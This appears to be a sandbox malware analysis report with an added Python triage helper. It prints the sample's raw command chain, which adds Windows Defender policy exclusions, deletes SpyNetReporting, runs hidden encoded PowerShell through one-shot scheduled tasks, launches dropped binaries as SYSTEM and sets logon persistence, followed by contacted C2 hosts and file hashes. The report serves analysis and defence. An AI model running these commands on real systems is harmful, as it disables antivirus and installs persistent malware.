\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gOoXQPhFC" /SC once /ST 04:34:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gOoXQPhFC"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gOoXQPhFC"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "mRaseIvrfxDtBOYKW" /SC once /ST 08:24:39 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe\" Ty /Cisite_idYrv 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "mRaseIvrfxDtBOYKW"

C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe

C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe Ty /Cisite_idYrv 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bdnnguwcOLBYKAjbbA"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\amDviS.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\JZfiWJf.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\eYZkXIj.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\jsGyjxb.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\AZEYcNv.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\AoTCTed.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FTXCzbcEvROqagNdd" /SC once /ST 05:12:17 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\rGBfzonX\YTmebuT.dll\",#1 /acsite_idhae 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "FTXCzbcEvROqagNdd"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\rGBfzonX\YTmebuT.dll",#1 /acsite_idhae 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\rGBfzonX\YTmebuT.dll",#1 /acsite_idhae 385118

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "FTXCzbcEvROqagNdd"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "mRaseIvrfxDtBOYKW"
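Read together, the command lines above are the sample's defence-evasion and execution chain in raw form. reg.exe writes exclusion entries under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender, the Group Policy-managed key rather than the local HKLM\SOFTWARE\Microsoft\Windows Defender configuration, so the Windows Security app shows the exclusions as set by an administrator and they are not removable from the UI; each write is repeated with /reg:32 and /reg:64 so both registry views agree. The same policy key is then used to delete the Exclusions\Extensions\exe value and the Spynet\SpyNetReporting value. schtasks is used as a one-shot launcher: a task is created, forced to run immediately with /run /I, and deleted, first to run an encoded PowerShell one-liner as the logged-on user (it decodes to a hidden gpupdate.exe /force, which is consistent with the gpt.ini writes in the Files list below), then with /RU "SYSTEM" to launch the dropped leAODjb.exe and YTmebuT.dll, while the ONLOGON and /xml tasks that remain are the persistence. The following Python is an added triage helper, not code from the sandbox report or from the malware: it parses command lines of this shape, decodes the -EncodedCommand payload (base64 of UTF-16LE text), and flags the create/run/delete task pattern. SAMPLE_LINES is a subset copied from the process list above; the function names and output layout are this example's own.

```python
"""Added triage helper (example code, not from the report or the sample).

Parses reg.exe / schtasks / powershell command lines of the shape seen in the
process list, decodes -EncodedCommand payloads and flags one-shot tasks.
"""
from __future__ import annotations

import base64
import re
from collections import defaultdict

DEFENDER_POLICY_ROOT = r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"

# Copied verbatim from the behavioral1 process list (a representative subset).
SAMPLE_LINES = [
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64',
    r'schtasks /CREATE /TN "gOoXQPhFC" /SC once /ST 04:34:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'schtasks /run /I /tn "gOoXQPhFC"',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==',
    r'schtasks /DELETE /F /TN "gOoXQPhFC"',
    r'schtasks /CREATE /TN "mRaseIvrfxDtBOYKW" /SC once /ST 08:24:39 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe\" Ty /Cisite_idYrv 385118 /S" /V1 /F',
    r'schtasks /run /I /tn "mRaseIvrfxDtBOYKW"',
    r'cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64',
    r'schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\amDviS.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F',
    r'schtasks /DELETE /F /TN "mRaseIvrfxDtBOYKW"',
]

# reg.exe ADD/DELETE whose target key sits under the Defender *policy* root.
_REG_RE = re.compile(
    r'(?i)\breg(?:\.exe)?"?\s+(add|delete)\s+"?'
    r'(HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender[^"\s]*)'
)
_ENC_RE = re.compile(r'(?i)-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)')
_SCHTASKS_RE = re.compile(r'(?i)\bschtasks(?:\.exe)?"?\s+/(create|run|delete|end)\b')


def _flag(cmd: str, name: str) -> str | None:
    """Value of /name: a "quoted" argument (honouring \\" escapes) or a bare token."""
    m = re.search(rf'(?i)/{re.escape(name)}\s+(?:"((?:[^"\\]|\\.)*)"|(\S+))', cmd)
    if not m:
        return None
    quoted, bare = m.group(1), m.group(2)
    return quoted.replace('\\"', '"') if quoted is not None else bare


def parse_defender_policy(cmd: str) -> dict | None:
    """Describe a policy-key write: op, subkey below the root, value, registry view."""
    m = _REG_RE.search(cmd)
    if not m:
        return None
    view = re.search(r'(?i)/reg:(32|64)', cmd)
    return {
        "op": m.group(1).lower(),
        "subkey": m.group(2)[len(DEFENDER_POLICY_ROOT):].lstrip("\\"),
        "value": _flag(cmd, "v"),
        "view": view.group(1) if view else "native",
    }


def decode_encoded_command(cmd: str) -> str | None:
    """-EncodedCommand is base64 over UTF-16LE text; return the plaintext or None."""
    m = _ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_schtasks(cmd: str) -> dict | None:
    """Operation, task name, account, trigger and action of a schtasks call."""
    m = _SCHTASKS_RE.search(cmd)
    if not m:
        return None
    return {
        "op": m.group(1).lower(),
        "name": _flag(cmd, "tn"),
        "run_as": _flag(cmd, "ru"),
        "schedule": _flag(cmd, "sc"),
        "action": _flag(cmd, "tr") or _flag(cmd, "xml"),
    }


def triage(lines: list[str]) -> dict:
    """Summarise Defender-policy tampering, decoded PowerShell and task abuse."""
    defender, powershell, tasks = [], [], defaultdict(list)
    for line in lines:
        if (d := parse_defender_policy(line)) is not None:
            defender.append(d)
        if (ps := decode_encoded_command(line)) is not None:
            powershell.append(ps)
        if (t := parse_schtasks(line)) is not None:
            tasks[t["name"]].append(t)
    # Excluded paths and the registry views (32/64) each was written to.
    views = defaultdict(set)
    for d in defender:
        if d["op"] == "add" and d["subkey"].lower() == r"exclusions\paths":
            views[d["value"]].add(d["view"])
    # create -> /run /I -> delete on one name: the scheduler as a one-shot launcher.
    ephemeral = sorted(
        name for name, ops in tasks.items()
        if {"create", "run", "delete"} <= {o["op"] for o in ops}
    )
    return {
        "defender_policy": defender,
        "excluded_paths": {p: sorted(v) for p, v in views.items()},
        "encoded_powershell": powershell,
        "tasks": dict(tasks),
        "ephemeral_tasks": ephemeral,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_LINES), indent=2))
```

On the full process list, "excluded_paths" is the list of directories to sweep for dropped payloads, and each path that appears with both views "32" and "64" confirms the double write. Remediation has to remove the values under the policy key in both views (the local Defender settings are untouched by this sample) and the remaining ONLOGON and XML-defined SYSTEM tasks, not just the ephemeral ones, which have already deleted themselves.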

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 172.67.169.89:443 yip.su tcp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 218.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 shipofdestiny.com udp
AT 5.42.64.17:80 5.42.64.17 tcp
RU 193.233.132.175:80 tcp
US 8.8.8.8:53 sty.ink udp
DE 185.172.128.144:80 185.172.128.144 tcp
US 8.8.8.8:53 operandotwo.com udp
US 8.8.8.8:53 namemail.org udp
US 8.8.8.8:53 cu82342.tw1.ru udp
US 8.8.8.8:53 net.geo.opera.com udp
US 172.67.152.98:443 shipofdestiny.com tcp
US 172.67.152.98:443 shipofdestiny.com tcp
US 172.67.160.247:443 operandotwo.com tcp
US 172.67.200.219:443 sty.ink tcp
US 172.67.200.219:443 sty.ink tcp
NL 185.26.182.111:80 net.geo.opera.com tcp
RU 176.57.210.144:443 cu82342.tw1.ru tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
US 8.8.8.8:53 lawyerbuyer.org udp
US 188.114.96.2:443 lawyerbuyer.org tcp
US 188.114.96.2:443 lawyerbuyer.org tcp
US 8.8.8.8:53 d.392391234.xyz udp
FR 95.164.45.22:443 d.392391234.xyz tcp
FR 95.164.45.22:443 d.392391234.xyz tcp
US 8.8.8.8:53 guseman.org udp
US 172.67.173.167:443 guseman.org tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 89.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 98.152.67.172.in-addr.arpa udp
US 8.8.8.8:53 144.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 17.64.42.5.in-addr.arpa udp
US 8.8.8.8:53 219.200.67.172.in-addr.arpa udp
US 8.8.8.8:53 247.160.67.172.in-addr.arpa udp
US 8.8.8.8:53 111.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 144.210.57.176.in-addr.arpa udp
US 8.8.8.8:53 2.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 22.45.164.95.in-addr.arpa udp
US 8.8.8.8:53 167.173.67.172.in-addr.arpa udp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 udp
DE 185.172.128.65:80 tcp
DE 185.172.128.65:80 tcp
US 8.8.8.8:53 65.128.172.185.in-addr.arpa udp
US 188.114.96.2:443 lawyerbuyer.org tcp
US 8.8.8.8:53 udp
DE 185.172.128.144:80 tcp
US 188.114.96.2:443 lawyerbuyer.org tcp
DE 185.172.128.209:80 185.172.128.209 tcp
US 188.114.96.2:443 lawyerbuyer.org tcp
US 188.114.96.2:443 lawyerbuyer.org tcp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 34.117.186.192:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
NL 185.26.182.117:443 tcp
NL 185.26.182.94:443 tcp
NL 82.145.217.121:443 tcp
GB 95.101.143.243:443 tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 104.18.11.89:443 download5.operacdn.com tcp
US 8.8.8.8:53 89.11.18.104.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 232.135.221.88.in-addr.arpa udp
DE 185.172.128.65:80 185.172.128.65 tcp
US 8.8.8.8:53 f901d83f-bf93-4ba3-a81a-54367772aec3.uuid.statstraffic.org udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 server13.statstraffic.org udp
US 8.8.8.8:53 stun1.l.google.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
BE 172.253.120.127:19302 stun1.l.google.com udp
BG 185.82.216.104:443 server13.statstraffic.org tcp
US 8.8.8.8:53 carsalessystem.com udp
US 172.67.221.71:443 carsalessystem.com tcp
US 8.8.8.8:53 127.120.253.172.in-addr.arpa udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 104.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 71.221.67.172.in-addr.arpa udp
BG 185.82.216.104:443 server13.statstraffic.org tcp
US 8.8.8.8:53 219.135.221.88.in-addr.arpa udp
NL 185.26.182.123:443 tcp
NL 185.26.182.123:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp
N/A 195.20.16.45:80 tcp
US 8.8.8.8:53 udp
N/A 172.67.188.178:443 tcp
US 8.8.8.8:53 udp
US 104.26.8.59:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 105.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 202.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.179.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 142.250.178.1:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 1.178.250.142.in-addr.arpa udp
GB 142.250.179.238:443 clients2.google.com tcp
US 8.8.8.8:53 api4.check-data.xyz udp
US 44.240.147.44:80 api4.check-data.xyz tcp
US 8.8.8.8:53 44.147.240.44.in-addr.arpa udp
US 8.8.8.8:53 server13.statstraffic.org udp
BG 185.82.216.104:443 server13.statstraffic.org tcp

Files

memory/4204-0-0x0000015A4F430000-0x0000015A4F43C000-memory.dmp

memory/4204-1-0x00007FFB35A30000-0x00007FFB364F1000-memory.dmp

memory/4204-2-0x0000015A69A00000-0x0000015A69A10000-memory.dmp

memory/4204-3-0x0000015A6A800000-0x0000015A6A876000-memory.dmp

memory/4204-4-0x0000015A6A780000-0x0000015A6A79E000-memory.dmp

memory/4204-5-0x0000015A6A7A0000-0x0000015A6A7FE000-memory.dmp

memory/1512-6-0x0000000000400000-0x0000000000408000-memory.dmp

memory/1512-7-0x00000000745E0000-0x0000000074D90000-memory.dmp

memory/1512-8-0x0000000002B60000-0x0000000002B70000-memory.dmp

memory/4204-9-0x00007FFB35A30000-0x00007FFB364F1000-memory.dmp

C:\Users\Admin\Pictures\kYGORkNl9EO4o6fyADcic3qo.exe

MD5 5b423612b36cde7f2745455c5dd82577
SHA1 0187c7c80743b44e9e0c193e993294e3b969cc3d
SHA256 e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09
SHA512 c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c

C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe

MD5 9cd8f017fce108d15a3da05ad68dc88d
SHA1 8a934caca9bc4aae78caf22ffb40fa52d0539bd2
SHA256 41cfcd320e71a9703685c95859dec2262cc459c3a5d6d4e2e4379d8f9695c854
SHA512 bd6fbdab2e4a67f09afb5c88441410ff5efa567da2ae0089da210f68f79e87ac7b04da43e710ec4fcf25ceef28dc13bcdff6335f37e35017f6b0039c53c4dc5b

memory/832-36-0x0000000000D90000-0x0000000000DFE000-memory.dmp

memory/832-35-0x0000000000E70000-0x0000000000F70000-memory.dmp

memory/832-37-0x0000000000400000-0x0000000000B0D000-memory.dmp

C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe

MD5 fd4e39b84976a233a5ec92fbe255ff48
SHA1 29fca043ec03807ad528fa222e9bb4039c0a64aa
SHA256 8004dce352977242b0ac40ede92b2eda494a22a3cb1366ae7336810f4cd364bc
SHA512 4f87776eb6687f636d6a8b0d931d1e789c49c624d9519a1afc1eceef385d4da3d9da1a1e7e28e4a8beb50de76d9bfab8eefc37479ea2148cbc681c0551c4a0dd

C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe

MD5 c4557771f0454d0924cff29fe81f2fb1
SHA1 905dfbc56726538788fde25dfc364509b220f3f3
SHA256 c8dba8d9f5446614284942a20ccc34a939be7ef2183f7da8e89ed4848a11cbaf
SHA512 5822384e112b7c92e1d0c2bf3d4b6017f0560c8f6fa0608881e7bd3f04acd8eab9a02df6ae8c13c22cd813aabbc6137cd27c0f72d847c0ac526a0fd7dd562e43

memory/4640-66-0x0000000002B20000-0x0000000002F1F000-memory.dmp

memory/4640-67-0x0000000002F20000-0x000000000380B000-memory.dmp

memory/2980-68-0x0000000002F50000-0x000000000383B000-memory.dmp

memory/2980-69-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/2980-70-0x0000000002A40000-0x0000000002E42000-memory.dmp

C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe

MD5 7960d8afbbac06f216cceeb1531093bb
SHA1 008221bf66a0749447cffcb86f2d1ec80e23fc76
